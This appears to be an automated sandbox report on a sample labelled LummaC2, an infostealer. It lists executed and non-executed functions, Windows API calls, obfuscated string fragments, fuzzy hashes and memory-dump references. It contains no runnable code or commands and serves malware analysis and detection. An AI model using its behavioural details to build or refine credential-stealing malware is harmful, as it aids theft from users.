Function 05AB0590 Relevance: .4, Instructions: 447COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1571750633.0000000005AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ab0000_OAKPYEH4c6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9cc1b53b849cabb0e0ffb3c21a62677dbb961511492b36c331f744e71d39e3b9
Instruction ID: da3247b09cdf9985ff44917e79abac2fff402e6b4df27a6f0afe2fd66858d81c
Opcode Fuzzy Hash: 9cc1b53b849cabb0e0ffb3c21a62677dbb961511492b36c331f744e71d39e3b9
Instruction Fuzzy Hash: 64513A34A00249DFCB05DFB8E59469E7FB2FF89710F2045A9C8046B350EB36A945CBA2

Function 05AB0A08 Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1571750633.0000000005AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ab0000_OAKPYEH4c6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 256f6a904b85e2acb7da1edc21e2a48d61dac2ebf559e90b2dce3e2adf2bfe39
Instruction ID: b8b5f261b86519c3a3b5275c0e015e1cf23cd7a732559fc09778559b8e0ea091
Opcode Fuzzy Hash: 256f6a904b85e2acb7da1edc21e2a48d61dac2ebf559e90b2dce3e2adf2bfe39
Instruction Fuzzy Hash: D06191307112409FDB14EB78E099B6ABFAAFB85310B558469D856873A2DF70FC41CB90

Function 05AB0848 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1571750633.0000000005AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ab0000_OAKPYEH4c6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 432c0405e3297c01f3fc0aa615941706b1a380929ba59f3b64b666ff55828ca8
Instruction ID: 2230bffaf59acff1476616202aa85f541330c37d2128e7bdc2c7f7ed52590dbc
Opcode Fuzzy Hash: 432c0405e3297c01f3fc0aa615941706b1a380929ba59f3b64b666ff55828ca8
Instruction Fuzzy Hash: 62410C34A00249DFDF04DFB8E594B9EBBB2FF89714F6045A8C90467350EB36A945CBA1

Function 05AB0C90 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1571750633.0000000005AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ab0000_OAKPYEH4c6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37506b85b8c897244301156d65f30ed033eebe2c659b91696899c9f59a4972cf
Instruction ID: b0697c7488209cf4b5f3fbf55ee5833e4455f81b0fbd01a0b1d80c2e527c0723
Opcode Fuzzy Hash: 37506b85b8c897244301156d65f30ed033eebe2c659b91696899c9f59a4972cf
Instruction Fuzzy Hash: 3D3105357002158BEB00DB6DE594AAFBBE9FF84314F10822AD819D7352DB70E945CBE2

Analysis Process: LummaC2.exePID: 1632, Parent PID: 1736COMMON

Execution Graph

Execution Coverage:	1.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	59.5%
Total number of Nodes:	42
Total number of Limit Nodes:	2

Executed Functions

Function 00A95135 Relevance: 65.4, Strings: 52, Instructions: 388
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

E, xrefs: 00A956F4
\, xrefs: 00A95497
t, xrefs: 00A95451
*, xrefs: 00A95228
(, xrefs: 00A95236
$, xrefs: 00A951E2
M, xrefs: 00A953C5
D, xrefs: 00A9545F
&, xrefs: 00A951D4
v, xrefs: 00A953A9
4, xrefs: 00A956DA
8, xrefs: 00A951C6
9, xrefs: 00A9546D
], xrefs: 00A95347
f, xrefs: 00A954CF
0, xrefs: 00A9518E
J, xrefs: 00A95148
2, xrefs: 00A95180
V, xrefs: 00A95363
f, xrefs: 00A954C1
,, xrefs: 00A9521A
r, xrefs: 00A953E1
<, xrefs: 00A951AA
4, xrefs: 00A95172
F, xrefs: 00A956F8
w, xrefs: 00A95443
H, xrefs: 00A95156
G, xrefs: 00A953FD
, xrefs: 00A951FE
h, xrefs: 00A95489
F, xrefs: 00A953D3
(, xrefs: 00A955F0
:, xrefs: 00A951B8
6, xrefs: 00A95164
i, xrefs: 00A95371
W, xrefs: 00A9537F
^, xrefs: 00A954A5
k, xrefs: 00A9532B
J, xrefs: 00A953EF
{, xrefs: 00A9539B
, xrefs: 00A954DD
M, xrefs: 00A95435
R, xrefs: 00A9547B
n, xrefs: 00A954B3
l, xrefs: 00A95355
., xrefs: 00A9520C
C, xrefs: 00A9540B
>, xrefs: 00A9519C
x, xrefs: 00A95419
", xrefs: 00A951F0
*, xrefs: 00A955E8
3, xrefs: 00A95427

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID:
String ID: $ $"$$$&$($($*$*$,$.$0$2$3$4$4$6$8$9$:$<$>$C$D$E$F$F$G$H$J$J$M$M$R$V$W$\$]$^$f$f$h$i$k$l$n$r$t$v$w$x${
API String ID: 0-1337114936
Opcode ID: 5ca376474b418dea4fb1faa50117debe2b79f933a94d4d3827fba16c04c7da98
Instruction ID: b25c666f225b72c03bebc50e9a5541fdc698e51fe621f9805e563cdb73f1af66
Opcode Fuzzy Hash: 5ca376474b418dea4fb1faa50117debe2b79f933a94d4d3827fba16c04c7da98
Instruction Fuzzy Hash: E42242219087E989DB32C67C8C187CDBEA15B27324F0843D9D1E96B3D2D7750B86CB66

Function 00A68720 Relevance: 7.7, APIs: 5, Instructions: 235
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 00A68744
GetCurrentThreadId.KERNEL32 ref: 00A6874E
SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00A68808
GetForegroundWindow.USER32 ref: 00A689A1
ExitProcess.KERNEL32 ref: 00A68A17

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
String ID:
API String ID: 4063528623-0
Opcode ID: baec71a229493f16bda608cc73319361600618b0b6ba66cde61d97e8708b2125
Instruction ID: c92a5d63fe3a115ce88a518ffd2929b3b98d4f7a0a7a16f67ca52c4600509a16
Opcode Fuzzy Hash: baec71a229493f16bda608cc73319361600618b0b6ba66cde61d97e8708b2125
Instruction Fuzzy Hash: 5E714673E143145BD318EF69DC4235AB6DB9BC1710F1F813EA894EB395EE798C028291

Function 00A9BAD0 Relevance: 1.5, APIs: 1, Instructions: 14
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(00A9EA7B,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 00A9BAFE

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

Function 00A9C59C Relevance: 1.3, Strings: 1, Instructions: 70
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

9., xrefs: 00A9C5F0

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID: InitializeThunk
String ID: 9.
API String ID: 2994545307-3220845746
Opcode ID: 479fa24713d159c74e003b8978aed724ac5936f413aacc2dd606acf462f4bbaa
Instruction ID: 125367955e08e7c24d804086c6f380598b9e0887c0352bdd07d2ea8390e2640b
Opcode Fuzzy Hash: 479fa24713d159c74e003b8978aed724ac5936f413aacc2dd606acf462f4bbaa
Instruction Fuzzy Hash: BB11E530B406218BDF14CF64DC547BAB7E1FB5A334F29A618D851A72E1D7349C458B40

Function 00A9EEC0 Relevance: .1, Instructions: 141
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 704fd1e533185523cb49fc22ed7aede064c1ed9bab9724e1e44c714bb2de8dc0
Instruction ID: b4f5449bc62059193df366c4d4630ac5b54aa5bb9291a8dcdc76d403738f2faa
Opcode Fuzzy Hash: 704fd1e533185523cb49fc22ed7aede064c1ed9bab9724e1e44c714bb2de8dc0
Instruction Fuzzy Hash: CB412771705305AFEB24CB25DDC1BBAB3E6EB89718F24452DE18697291EB31BC11C641

Function 00A9BC91 Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetForegroundWindow.USER32 ref: 00A9BCA2

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
Opcode ID: 3d0cc6a7065dbc14ae71eaba877bb925bcb2c8d18cd28525bc56ba39038aa3ef
Instruction ID: e5056d73e3cdb09185185b28dd7d7a13444e320943b51826788eb8fd723003bd
Opcode Fuzzy Hash: 3d0cc6a7065dbc14ae71eaba877bb925bcb2c8d18cd28525bc56ba39038aa3ef
Instruction Fuzzy Hash: BAE04FB9A019469FCB48CFA8EC505BE77A1F75A314704052EE503C77A1DB389507CB04

Function 00A9A080 Relevance: 1.5, APIs: 1, Instructions: 9
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(?,00000000,?,7B1647F3,00A688F3,10130D9D), ref: 00A9A090

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 934269b443258396a14c3ba95ceb768a7ef4f4e45d35b29a4ef7c327f2716cba
Instruction ID: 6ae00be28402f2c546993407beec60dbd6c52b4c0f4966473c077a5787beacad
Opcode Fuzzy Hash: 934269b443258396a14c3ba95ceb768a7ef4f4e45d35b29a4ef7c327f2716cba
Instruction Fuzzy Hash: 32C04831185121AACA24AB18ED09FCA3AA8EF45360F160091B209660B28A60AC928A94

Non-executed Functions

Function 00A9483C Relevance: 34.0, Strings: 27, Instructions: 298
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

0, xrefs: 00A94B4D
n, xrefs: 00A94879
), xrefs: 00A94946
_, xrefs: 00A94A84
b, xrefs: 00A94895
h, xrefs: 00A9486B
<, xrefs: 00A94A3A
>, xrefs: 00A9498A
j, xrefs: 00A9485D
1, xrefs: 00A9491A
2, xrefs: 00A9499A
O, xrefs: 00A94880
<, xrefs: 00A94992
b, xrefs: 00A94A7C
f, xrefs: 00A948B1
], xrefs: 00A94A94
:, xrefs: 00A9497A
8, xrefs: 00A94982
t, xrefs: 00A9484F
f, xrefs: 00A94A8C
?, xrefs: 00A948F0
l, xrefs: 00A94887
>, xrefs: 00A94A43
d, xrefs: 00A948BF
3, xrefs: 00A9499E
`, xrefs: 00A948A3
0, xrefs: 00A949A2

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID:
String ID: )$0$0$1$2$3$8$:$<$<$>$>$?$O$]$_$`$b$b$d$f$f$h$j$l$n$t
API String ID: 0-3467771618
Opcode ID: 0336695ff60afe66b98fdb903a9938cdf36b6d2fab7deb71630ccab4eb522c2a
Instruction ID: dadb40f61b9d9328f4405f520d80f0bb0393c307dbe80824f5b8cc4b2f68c097
Opcode Fuzzy Hash: 0336695ff60afe66b98fdb903a9938cdf36b6d2fab7deb71630ccab4eb522c2a
Instruction Fuzzy Hash: A2E191219087E98EDB22C67C88443DDBFB15B57324F1843D9D4E86B3D2C7754A86CB62

Function 00A96BF0 Relevance: 20.0, APIs: 10, Strings: 1, Instructions: 718memorycomCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00AA168C,00000000,00000001,00AA167C,00000000), ref: 00A96E11
SysAllocString.OLEAUT32(F5A3FBA8), ref: 00A96EDA
CoSetProxyBlanket.OLE32(D77F9D52,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00A96F18
SysAllocString.OLEAUT32(68DA6AD6), ref: 00A96F6D
SysAllocString.OLEAUT32(BD01C371), ref: 00A97025
VariantInit.OLEAUT32(F8FBFAF5), ref: 00A97097
SysFreeString.OLEAUT32(?), ref: 00A97382
SysFreeString.OLEAUT32(?), ref: 00A97388
SysFreeString.OLEAUT32(00000000), ref: 00A97399

Strings

\, xrefs: 00A96DCB

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID: String$AllocFree$BlanketCreateInitInstanceProxyVariant
String ID: \
API String ID: 2737081056-2967466578
Opcode ID: e5c86ab847da955096000f8c2e2228352f53f3ad2794ec907cc1afcaafdea80f
Instruction ID: 4db2794b08e66ba9586b88750e42ed810bf77cd91cf4b56865316d20e6b4679c
Opcode Fuzzy Hash: e5c86ab847da955096000f8c2e2228352f53f3ad2794ec907cc1afcaafdea80f
Instruction Fuzzy Hash: 8D320071A583508FDB14CF68C880BAFBBE1EFD5310F188A2DE5958B291D774D805CBA2

Function 00A6B14F Relevance: 15.5, Strings: 12, Instructions: 473COMMON

Download Yara Rule

Strings

DxY~, xrefs: 00A6B1E0
9D,J, xrefs: 00A6B173
6\/b, xrefs: 00A6B19D
7, xrefs: 00A6B5E9
EtEz, xrefs: 00A6B1D6
;lMr, xrefs: 00A6B1C2
.L~R, xrefs: 00A6B181
Kh;n, xrefs: 00A6B1B8
fPcV, xrefs: 00A6B188
gTuZ, xrefs: 00A6B18F
BpAv, xrefs: 00A6B1CC
'H%N, xrefs: 00A6B17A

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID:
String ID: 'H%N$.L~R$6\/b$7$9D,J$;lMr$BpAv$DxY~$EtEz$Kh;n$fPcV$gTuZ
API String ID: 0-762781089
Opcode ID: b647cf4b56591cc4861f6b491d812c29f0b65e6ec4c8ce79bda5af34f8ac34a9
Instruction ID: a185dc49233e2f53656cea905176ee771008373b210bcf119c2d5ede48e80129
Opcode Fuzzy Hash: b647cf4b56591cc4861f6b491d812c29f0b65e6ec4c8ce79bda5af34f8ac34a9
Instruction Fuzzy Hash: FE02ADB5200B02DFD720CF65D991797BBE1FB8A300F14896CD5AA8B6A0DB75A846CF50

Function 00A83FF1 Relevance: 14.9, Strings: 11, Instructions: 1151COMMON

Download Yara Rule

Strings

?2, xrefs: 00A84418
GZ, xrefs: 00A8442E
RQ, xrefs: 00A84423
XY, xrefs: 00A84FE1
~x, xrefs: 00A847DC
Um, xrefs: 00A847F2
^_, xrefs: 00A84223
}{, xrefs: 00A847D1
~C, xrefs: 00A847E7
`.`,, xrefs: 00A84881
|*z(, xrefs: 00A8488C

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID:
String ID: ?2$GZ$RQ$Um$XY$^_$`.`,$|*z($}{$~C$~x
API String ID: 0-3286641888
Opcode ID: a102169469811637adea1446c7edef96549cf70bd74010ad7200961066e36420
Instruction ID: 532dce410f89d2f2fd6d5bf3d95c930f7b7314051d687ddc4ab04078cfc32951
Opcode Fuzzy Hash: a102169469811637adea1446c7edef96549cf70bd74010ad7200961066e36420
Instruction Fuzzy Hash: 57A273B160C7868BC334DF64D8517AFBBF2FB95300F10892CE5DA9B251E77199068B86

Function 00A70F71 Relevance: 14.5, Strings: 11, Instructions: 732COMMON

Download Yara Rule

Strings

8, xrefs: 00A71571
5, xrefs: 00A7144C
}, xrefs: 00A70F7F
F, xrefs: 00A70FF4
x, xrefs: 00A717E7
V, xrefs: 00A7187A
E, xrefs: 00A71872
F, xrefs: 00A71743
*, xrefs: 00A71579
t, xrefs: 00A712E2
T, xrefs: 00A7186A

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID:
String ID: *$5$8$E$F$F$T$V$t$x$}
API String ID: 0-2030276459
Opcode ID: 446ef13eda532ac7f2ce26656898017cb0604aa49f539d2b89072192537b1925
Instruction ID: 7b57292c2cb47636126cdb8912dd16bdd5c873813cfe21241e6917f798a2272a
Opcode Fuzzy Hash: 446ef13eda532ac7f2ce26656898017cb0604aa49f539d2b89072192537b1925
Instruction Fuzzy Hash: 13527D7160D7908BC3249B3CC9957AEBBE1ABC5314F19CA2ED8DDC7382D67889418B53

Function 00A81550 Relevance: 14.2, Strings: 11, Instructions: 497COMMON

Download Yara Rule

Strings

!@, xrefs: 00A81583
d, xrefs: 00A81767
e, xrefs: 00A8176C
,, xrefs: 00A81A6C
k, xrefs: 00A81762
P, xrefs: 00A81961
U, xrefs: 00A81952
R, xrefs: 00A8195C
\, xrefs: 00A8175D
[, xrefs: 00A81957
\, xrefs: 00A81B06

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID: AllocateHeap
String ID: !@$,$P$R$U$[$\$\$d$e$k
API String ID: 1279760036-3655135053
Opcode ID: 50b9cab7c4e72b68337910ad235c27c73a16e1c7f25713a27f4401905d551db7
Instruction ID: 75c8fb0e2ddb6581885c145d67a3867a44ff6e235e6be4c3b862c49abf7de7a5
Opcode Fuzzy Hash: 50b9cab7c4e72b68337910ad235c27c73a16e1c7f25713a27f4401905d551db7
Instruction Fuzzy Hash: D422AF7160C7808FD324EF28C4953AFBBE5AB96314F18492DE4D687392E7798846CB53

Function 00A7E230 Relevance: 9.9, Strings: 7, Instructions: 1107COMMON

Download Yara Rule

Strings

@Nxz, xrefs: 00A7E536
]^he, xrefs: 00A7E55E
pKp^, xrefs: 00A7E54E
vvFE, xrefs: 00A7E546
WYRT, xrefs: 00A7E566
FEtp, xrefs: 00A7E5DF
f, xrefs: 00A7E438

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID:
String ID: @Nxz$FEtp$WYRT$]^he$f$pKp^$vvFE
API String ID: 0-4211064948
Opcode ID: 9019f2f6849e360919ff82015ee6acca7eb191cb4c8a6324c92bcc0bcfbf42c4
Instruction ID: 1dc5b874f44fe2053d31776931667efe011b42b62fc6b6ac5b1f3a2f4c91707a
Opcode Fuzzy Hash: 9019f2f6849e360919ff82015ee6acca7eb191cb4c8a6324c92bcc0bcfbf42c4
Instruction Fuzzy Hash: FD72297560C3418FC725CF28CC5066EBBE1AFD9314F18CAADE4E98B392D6359905CB92

Function 00A75640 Relevance: 9.7, Strings: 7, Instructions: 943COMMON

Download Yara Rule

Strings

s|}, xrefs: 00A7606E
JHN], xrefs: 00A75D66
YU]&, xrefs: 00A76170
wq, xrefs: 00A76063
UR, xrefs: 00A75AE3
>j%h, xrefs: 00A75976
Fi, xrefs: 00A75D71

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID:
String ID: >j%h$Fi$JHN]$UR$YU]&$s|}$wq
